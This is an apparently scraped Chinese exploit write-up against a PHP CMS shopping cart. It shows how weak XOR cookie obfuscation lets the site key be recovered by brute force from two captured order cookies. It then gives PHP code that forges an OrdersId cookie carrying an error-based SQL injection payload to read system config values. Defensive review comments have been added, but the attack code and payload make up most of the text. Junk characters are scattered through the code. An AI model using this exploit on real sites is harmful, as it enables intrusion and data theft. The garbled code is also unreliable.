www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Writes one cart value to a client cookie.
 *
 * Arrays are first flattened by enCode() and then passed through enCrypt();
 * scalars go straight to enCrypt(). The cookie is set site-wide ('/') with a
 * lifetime of 36000 seconds.
 *
 * NOTE(review): enCrypt() (see below) is a keyed XOR with no integrity tag, so
 * nothing here stops a client from returning a cookie of its own making; every
 * reader of this cookie must treat the decoded value as untrusted input.
 *
 * @param string $key   cookie name
 * @param mixed  $value array or scalar to store
 */
function saveCookie($key, $value)
{
    $plain = is_array($value) ? $this->enCode($value) : $value;
    setcookie($key, $this->enCrypt($plain), time() + 36000, '/');
}
简单地说,$key 就是 cookie 的 key,$value 就是 value;enCode 的作用是将 array 类型转变为 a=yy&b=cc&d=know 这样的字符串,关键是 enCrypt 函数。
/**
 * Obfuscates a cart string for storage in a cookie.
 *
 * A per-call key is taken as md5() of rand(0, 32000) after seeding rand()
 * from microtime(). Each plaintext byte is XORed with one key byte, and that
 * key byte is written into the output immediately before the XORed byte, so
 * the result carries its own key. The whole stream is then passed through
 * setKey() and base64-encoded.
 *
 * NOTE(review): rand(0, 32000) yields at most 32001 distinct keys and the key
 * is embedded in the output, so this gives no confidentiality against a reader
 * who knows part of the plaintext, and no integrity at all; nothing visible in
 * this file authenticates the cookie before it is trusted on return.
 *
 * @param string $txt plaintext to obfuscate
 * @return string base64 text
 */
function enCrypt($txt)
{
    srand((double)microtime() * 1000000);
    $cookieKey = md5(rand(0, 32000));
    $keyLen = strlen($cookieKey);
    $stream = '';
    $len = strlen($txt);
    for ($i = 0; $i < $len; $i++) {
        $k = $cookieKey[$i % $keyLen];
        // Key byte first, then the masked plaintext byte.
        $stream .= $k . ($txt[$i] ^ $k);
    }
    return base64_encode($this->setKey($stream));
}
/**
 * XORs $txt byte-by-byte with the site-wide cookie key.
 *
 * The key is md5(strtolower($cfg_cookie_encode)) — 32 hex characters — and is
 * reused cyclically. The operation is its own inverse (setKey(setKey($x)) === $x).
 *
 * NOTE(review): a repeating-key XOR with no MAC: anyone who knows the
 * plaintext of one cookie can read the key back out of it and then forge
 * arbitrary cookies. Only a keyed hash (HMAC) over the cookie, verified before
 * the value is used, would make forged cookies detectable.
 *
 * @param string $txt input bytes
 * @return string same length as $txt
 */
function setKey($txt)
{
    global $cfg_cookie_encode;
    $siteKey = md5(strtolower($cfg_cookie_encode));
    $keyLen = strlen($siteKey);
    $out = '';
    $len = strlen($txt);
    for ($i = 0; $i < $len; $i++) {
        $out .= $txt[$i] ^ $siteKey[$i % $keyLen];
    }
    return $out;
}
enCrypt 的参数 $txt 我们是可知的,返回值就是 cookie 的值,这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp,这个参数在某种意义上我们也是可知的,因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能,我们可以推出 32000 种可能的 $tmp,从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了,忘记说了,我们的目的是推测出 setKey 中 $encrypt_key 的值,然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中,简单过滤掉含非字母数字字符的 key,就只剩下几百个可能的 key;然后我们重新下一次订单,再获取几百个可能的 key,取交集,得到最终 key。
具体代码如下:
; o3 O9 a$ C7 n( k8 v<?php/ N C5 g! p0 P% O
// Two cookies captured for the same cart contents; both were produced by the enCrypt() shown above.
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
) F8 t6 y. V' p/ `$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
// The known plaintext behind both cookies (the enCode()'d cart record).
( _: F ?3 N" A2 I9 ?2 r$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
// Given one cookie and a candidate pre-setKey() stream ($string), XORs the first
// 32 bytes of the decoded cookie against it, which yields a candidate for the
// site-wide setKey() key. This is recoverable only because setKey() is an
// unauthenticated XOR; an HMAC over the cookie, checked before decryption,
// would stop forged cookies regardless of what this reveals.
1 S- w g: v N: a+ y7 Z# i0 cfunction reStrCode($code,$string). m9 J. \3 X( Q+ C
{" P+ w- r5 ?: m7 m8 N
$code = base64_decode($code);
- j0 k! j+ _8 r \$key = “”;+ z' o1 O c$ ?/ l& d3 t) z/ K) ~
for($i=0 ; $i<32 ; $i++), G% ?6 y4 J! o4 b+ D' ]5 I* t) @
{
' u, U' I) }& M7 ]! v( k$key .= $string[$i] ^ $code[$i];6 R) f& r0 q$ M
}5 E+ p6 A" |/ H# G. g; \
return $key;
( y% o& R- K0 \) B}/ l. u3 ^+ r- ]7 h" `5 ]
// Walks every per-cookie key the server could have drawn — md5() of a rand(0, 32000)
// value — and keeps the site-key candidates that look like an md5 hex string.
// The search is this cheap only because enCrypt() takes its key from rand()
// seeded by microtime(); a CSPRNG (random_bytes()) would make enumeration
// infeasible, and a MAC over the cookie would make a recovered key useless.
function getKeys($cookie,$plantxt): b" G: g$ M9 T
{; O0 h" f$ ^$ r' R) y* B! L
$tmp = $cookie;) ?! [- X/ x( ]/ C. u# T
$results = array();; p: v+ j5 c$ p* t
for($j=0 ; $j < 32000; $j++)
* K0 g4 \. j% a T{+ c& K- |3 ?6 M+ u4 ^
$ c% n) \# c: d
$txt = $plantxt;
* Z$ |; n' V7 K$ j$ B/ t3 L$ctr = 0;
3 D) {' L- C, f6 P* i$tmp = ”;* c# F8 o$ `* H' N' ]8 K
$encrypt_key = md5($j);# a/ x# d! |- S4 b) o o
for($i =0; $i < strlen($txt); $i ++)
" I- M9 L3 F; \1 x5 h{( f4 x* X4 g* x6 S/ P9 M
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;7 W3 v3 _# D( i/ E+ X; Q# A3 }& J
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
6 k. J/ m8 Q: m" L}
# g6 u/ x$ K9 f9 R7 e$string = $tmp;: L3 v6 m' C9 K" S
$code = $cookie;
' R. z% v" g. l$result = reStrCode($code,$string);3 g i" B' m( j, }# A8 Z% {) O) z
if(eregi(‘^[a-z0-9]+$’,$result))
, I# B0 N$ w7 x5 r/ |. J& K3 |{
$ w4 V- q3 E" N7 {/ q+ T/ ]) L$ K$ qecho $result.”\n”;$ p4 U9 O; u6 h& v: J$ b1 p
$results[] = $result;
# e4 w7 P1 R1 l5 R2 d+ C2 t}
5 @' m* f. O0 l0 U' K}
8 p8 C) T5 i7 e" K$ ]8 {% w+ z8 Oreturn $results;$ g; B: ^/ d1 m- G& M- a B1 `
}3 J J) H0 l6 B; L9 b& n" H6 f
// Candidates shared by two independently issued cookies are the site key: the
// scheme leaks md5(strtolower($cfg_cookie_encode)) after two observed orders,
// which is why the cookie key must never be the only thing standing between a
// client and a trusted value.
$results1 = getKeys($cookie1,$plantxt);0 J% l7 r3 T% t6 O
$results2 = getKeys($cookie2,$plantxt);
, _( s/ O" T. ~2 Qprint “\n——————–real key————————–\n”;* C. d5 ]$ x. K/ \- J9 \) h( V' h
foreach($results1 as $test1)
' X) D: P7 W. j$ L{
" t5 Z$ ?8 O; [! M$ i+ E" jforeach($results2 as $test2)
& z: y( h7 G% d8 @+ u: r1 \/ s$ X{5 |. ^/ `) A: [& B# g
if($test1 == $test2)2 j0 w& b6 H3 h7 I, F( R
{
7 c- D) e! ]: u6 s$ V/ f/ F( Becho $test1.”\n”;
/ Y3 c4 `) k4 h6 u9 P# J( H$ Z4 J}
6 M- V; n: Q* J' a" h}
+ |" T* l5 Z9 h) `$ I}
. e, H2 Z3 c$ @/ Z/ m& T! V' X?>7 s: ~ T1 U0 A6 D( V: G
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie,
plantxt 可以根据页面自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个 key 之后,我们就可以构造任意购物车的 cookie。
接着看
20 class MemberShops: W1 k9 @* ~) B: O8 H A& ~! p
21 {
: t& B5 H& [+ Q$ F8 H. p22 var $OrdersId;
* Z. e; c' U3 I( |23 var $productsId;
7 v6 L. I, I2 K. s4 q k' R24$ A5 Y/ {5 i! H# p* Y+ l
/**
 * Initialises the order id for this cart.
 *
 * The id is read from the client's "OrdersId" cookie via getCookie(); a new
 * one is generated with MakeOrders() only when that cookie is absent or empty.
 *
 * NOTE(review): the cookie value is client-controlled and is later interpolated
 * unquoted-safe into SQL in carbuyaction.php (`WHERE oid='$OrdersId'` on this
 * page), so it has to be validated here (or bound as a parameter there) before
 * it reaches the database.
 */
function __construct()
{
    $this->OrdersId = $this->getCookie("OrdersId");
    if (!empty($this->OrdersId)) {
        return;
    }
    $this->OrdersId = $this->MakeOrders();
}
发现 OrdersId 是从 cookie 里面获取的
然后
/plus/carbuyaction.php 中的
29 $cart = new MemberShops();
: E) E& W1 A; } a) h6 F39 $OrdersId = $cart->OrdersId; //本次记录的订单号" O5 q% G8 I* `
……
! _1 O6 c3 O7 ^7 \& N0 L173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);8 h$ z2 _# r* P" p
接着我们就可以注入了
通过下面的代码生成 cookie:
+ ~3 }3 I. v4 U* S6 M q- G<?php
8 N) q3 }/ M [0 g8 m! P$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
7 K7 \7 u( x9 x. H9 E! Y2 O F$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
// Copy of shopcar.class.php setKey(), except the key is the recovered
// md5(strtolower($cfg_cookie_encode)) value held in $encrypt_key instead of
// being derived from configuration. Same repeating-key XOR, same lack of a MAC.
; C) t# [! J. M$ j: @5 K. c* efunction setKey($txt)! p/ M7 m) J V* l4 U/ J; s
{" q) ^# @! p, c2 s, Q
global $encrypt_key;
0 d( F9 N z K! m' s y# h$ctr = 0;
8 C! l$ t8 C! @9 K$tmp = ”;" j' m# ]% }+ S* [5 T
for($i = 0; $i < strlen($txt); $i++)
) q# y3 r; O4 e) [6 h/ K8 m{* @: e4 w9 |9 g- t
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;9 H- a* I& `/ c& ]# q8 O# [" {
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
, h5 ~7 Y# j, }8 _}
& u7 N- B8 F$ t, r. E* {* g. Jreturn $tmp;
1 P+ h' n# _$ b}! ^2 v& K7 ]2 q5 i
// Copy of shopcar.class.php enCrypt(): the per-cookie key is stored in the clear
// next to each XORed byte, so the server needs no secret to undo it — and neither
// does anyone else. Only the setKey() key protects the cookie, and that key is
// the one recovered above.
function enCrypt($txt)
0 o4 s* n( C0 i{# f1 |0 B0 e0 U% Q6 E
srand((double)microtime() * 1000000);% g& z# S1 M9 e# {! [3 b( N- C% Y
$encrypt_key = md5(rand(0, 32000));
2 n: R. T- J8 |3 |# ~. r" C# ?$ctr = 0;
/ y' d; |* |3 n5 w1 X$tmp = ”;, k0 H) k Q. Q* k4 D$ ] L2 g( B: G
for($i = 0; $i < strlen($txt); $i++)
. P, I5 E1 ?" P+ A{
P4 A7 T! o: f% J8 E7 \$ |$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
" s# h. \+ Y( \$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
0 @2 ?$ s2 A V' O0 Q$ Q) O}
P8 s6 A* L& V9 b( Greturn base64_encode(setKey($tmp));' F# j# N0 k2 q6 T
}
// enCrypt() draws a fresh random per-cookie key on every call; this simply retries
// until the base64 output contains no '+' — presumably to avoid that character
// being mangled in cookie transport (not confirmed here). The fact that any of
// these outputs is accepted by the server is the point: nothing on the server
// side distinguishes a genuine cookie from a constructed one.
; S0 t- _- x4 ?* {* ]8 ^for($dest =0;$dest = enCrypt($txt);)( c; [5 I; y' s
{
2 D" e; F" t! Q' }if(!strpos($dest,’+'))
" o& _8 K" q' _{
8 L1 H# G8 I" j( F" @; J6 Q0 q" kbreak;
+ c' ^1 ^4 _+ ` T" o& Q}
2 h: L1 ?' R& x5 i3 M. ~, s4 K0 B}
% n' V6 H+ a( y; G2 Q7 D0 fecho $dest.”\n”;
* _- J6 h1 l9 K+ \' \ D?>
& Z( {$ W9 j2 q+ K
' e6 Y( \$ k! G: P4 t/ H8 m |